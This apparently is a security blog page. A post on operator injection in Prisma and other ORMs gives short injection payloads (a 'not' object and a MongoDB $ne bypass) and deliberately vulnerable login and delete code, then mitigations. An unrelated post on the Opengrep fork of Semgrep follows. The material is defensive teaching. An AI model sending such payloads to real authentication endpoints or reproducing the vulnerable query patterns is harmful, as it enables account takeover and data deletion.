const user = await prisma.user.findFirst({
  where: { email, password },
});
Looks harmless, right? But what if an attacker sends password = { "not": "" }? Instead of returning the User object only when email and password match, the query now returns the User whenever the provided email matches.
This vulnerability is known as operator injection, but it’s more commonly referred to as NoSQL injection. What many developers don’t realize is that, despite strict model schemas, some ORMs are vulnerable to operator injection even when they’re used with a relational database such as PostgreSQL, making it a more widespread risk than expected.
In this post, we’ll explore how operator injection works, demonstrate exploits in Prisma ORM, and discuss how to prevent them.
Understanding Operator Injection
To understand operator injection in ORMs, it’s interesting to first look at NoSQL injection. MongoDB introduced developers to an API for querying data using operators such as $eq
, $lt
and $ne
. When user input is passed blindly to MongoDB's query functions, there exists a risk of NoSQL injection.
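As a quick illustration, here’s a hypothetical login route (not code from any package discussed here), assuming the official mongodb driver and an Express app with JSON body parsing:

const express = require('express');
const { MongoClient } = require('mongodb');

async function main() {
    const client = new MongoClient('mongodb://localhost:27017');
    await client.connect();
    const users = client.db('demo').collection('users');

    const app = express();
    app.use(express.json());

    app.post('/login', async (req, res) => {
        const { email, password } = req.body;
        // Intended: both fields must equal the submitted strings.
        // If the client posts { "email": "victim@example.com", "password": { "$ne": "" } },
        // the injected $ne operator matches any non-empty password, bypassing the check.
        const user = await users.findOne({ email, password });
        res.json({ authenticated: Boolean(user) });
    });

    app.listen(3000);
}

main().catch(console.error);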
Popular ORM libraries for JavaScript started offering a similar API for querying data and now almost all major ORMs support some variation of query operators, even when they don’t support MongoDB. Prisma, Sequelize and TypeORM have all implemented support for query operators for relational databases such as PostgreSQL.
Exploiting Operator Injection in Prisma
Prisma query functions that operate on more than one record typically support query operators and are vulnerable to injection. Example functions include findFirst, findMany, updateMany and deleteMany. While Prisma does validate the model fields referenced in the query at runtime, operators are a valid input for these functions and therefore aren’t rejected by validation.
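For instance, here’s a minimal sketch of how an injected operator can widen a deleteMany call (a hypothetical helper, assuming a Post model with an authorId field, which is not shown in the appendix schema):

const { PrismaClient } = require('@prisma/client');
const prisma = new PrismaClient();

// Meant to delete ONE of the caller's posts, identified by a numeric id.
async function deleteOwnPost(userId, postIdFromRequest) {
    // If postIdFromRequest arrives as the object { "not": -1 } instead of a number,
    // Prisma accepts it as an operator and the filter matches every post the user owns.
    return prisma.post.deleteMany({
        where: { id: postIdFromRequest, authorId: userId },
    });
}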
One reason why operator injection is easy to exploit in Prisma is the string-based operators offered by the Prisma API. Some ORM libraries have removed support for string-based query operators because they are so easily overlooked by developers and easy to exploit. Instead, they force developers to reference custom objects for operators. As these objects cannot be readily de-serialized from user input, the risk of operator injection is greatly reduced in these libraries.
Not all query functions in Prisma are vulnerable to operator injection. Functions that select or mutate a single database record typically do not support operators and throw a runtime error when an Object is provided. Apart from findUnique, the Prisma update, delete and upsert functions also do not accept operators in their where filter.
// This query throws a runtime error:
// Argument `email`: Invalid value provided. Expected String, provided Object.
const user = await prisma.user.findUnique({
  where: { email: { not: "" } },
});
Best Practices to Prevent Operator Injection
1. Cast User Input to Primitive Data Types
Typically casting input to primitive data types such as strings or numbers suffices to prevent attackers from injecting objects. In the original example, casting would look as follows:
const user = await prisma.user.findFirst({
  where: { email: email.toString(), password: password.toString() },
});
2. Validate User Input
While casting is effective, you might want to validate the user input, to ensure that the input meets your business logic requirements.
There are many libraries for server-side validation of user input, such as class-validator, zod and joi. If you’re developing for a web application framework such as NestJS or NextJS, they likely recommend specific methods for user input validation in the controller.
In the original example, zod validation might look as follows:
import { z } from "zod";

const authInputSchema = z.object({
  email: z.string().email(),
  password: z.string().min(8)
});

const { email, password } = authInputSchema.parse({ email: req.params.email, password: req.params.password });

const user = await prisma.user.findFirst({
  where: { email, password },
});
3. Keep your ORM updated
Stay updated to benefit from security improvements and fixes. For example, Sequelize disabled string aliases for query operators starting from version 4.12, which significantly reduces susceptibility to operator injection.
Conclusion
Operator injection is a real threat for applications using modern ORMs. The vulnerability stems from the ORM API design and isn’t related to the database type in use. Indeed, even Prisma combined with PostgreSQL may be vulnerable to operator injection. While Prisma offers some built-in protection against operator injection, developers must still practice input validation and sanitization to ensure application security.
Appendix: Prisma schema for User model
// This is your Prisma schema file,
// learn more about it in the docs: https://pris.ly/d/prisma-schema

generator client {
  provider = "prisma-client-js"
}

datasource db {
  provider = "postgresql"
  url      = env("DATABASE_URL")
}

// ...

model User {
  id       Int      @id @default(autoincrement())
  email    String   @unique
  password String
  name     String?
  posts    Post[]
  profile  Profile?
}

Launching Opengrep | Why we forked Semgrep
TL;DR: We’re launching Opengrep, a fork of Semgrep CE, in response to its open-source clampdown.
We are the initiators of Opengrep. Let’s get into it: Last month, Semgrep announced major changes to its OSS project—strategically timed for a Friday, of course ;)
Since 2017, Semgrep has been a cornerstone of the open-source security community, offering a code analysis engine and rule repository alongside its SaaS product. But their recent moves raise the question: what does “open” really mean?
Key changes include locking community-contributed rules under a restrictive license and migrating critical features like tracking ignores, LOC, fingerprints, and essential metavariables away from the open project.
This isn’t surprising—Semgrep has been quietly quitting the open-source engine for some time. The rebranding from “Semgrep OSS” to “Semgrep Community Edition” feels like the final nail in the coffin.
Why?
Perhaps pressure from VCs, viewing open-source contributions as “cannibalizing” SaaS revenue, or protecting against competition? Semgrep claims the move was to stop vendors from using the rules and engine in competing SaaS offerings. Yet, just yesterday with their “AI” announcement, the founder declared, “the original Semgrep engine is becoming obsolete.”
Whatever the case, while we respect a competitive spirit, this open-source clampdown does little to stop rival organizations. More than anything, this move undermines community trust—not just in Semgrep, but across open-source projects.
“This sort of change also harms all similar open-source projects. Every company and every developer now needs to think twice before adopting and investing in an open-source project in case the creator suddenly decides to change the license”... or kneecap the functionality (Opentofu).
This pattern is familiar: Elasticsearch’s license shift led AWS to create OpenSearch. The Opentofu movement arose after HashiCorp’s Terraform rugpull. Vendor-led open-source projects often prioritize commercial interests over community to make it to the “big leagues.” And that sucks.
So, we’re taking action.
We’ve united with 10 direct competitors to launch Opengrep—a coordinated, industry-wide stand to keep a great open-source project alive and make secure software development a vendor-neutral, shared standard.
I’m joined by Nir Valtman (CEO, Arnica), Ali Mesdaq (CEO, Amplify Security), Varun Badhwar (CEO, Endor Labs), Aviram Shmueli (CIO, Jit), Pavel Furman (CTO, Kodem), Liav Caspi (CTO, Legit), Eitan Worcel (CEO, Mobb), and Yoav Alon (CTO, Orca Security).

What can you expect with Opengrep?
Performance improvements, unlocking pro-only features, extended language support, migrating critical features back to the engine, and new advancements: Windows compatibility, cross-file analysis; the roadmap is long.
Together, we’re pooling committed capital and OCAML development resources to advance and commoditize static application security testing.
Because let’s face it—there are more interesting things to build. Finding is one thing... let’s focus on the future, on how we can find and fix security vulnerabilities fast automatically. Let’s focus on getting devs back to building.
Want to learn more about Opengrep?
Read the Opengrep Manifesto. Leverage and contribute to Opengrep today.
To contribute or join as a sponsor, open an issue on GitHub.
For community & contributors, join the open roadmap session on 20th February.
Follow along on X and LinkedIn.

“Ensure the future of SAST is Open” On Opengrep with Mackenzie Jackson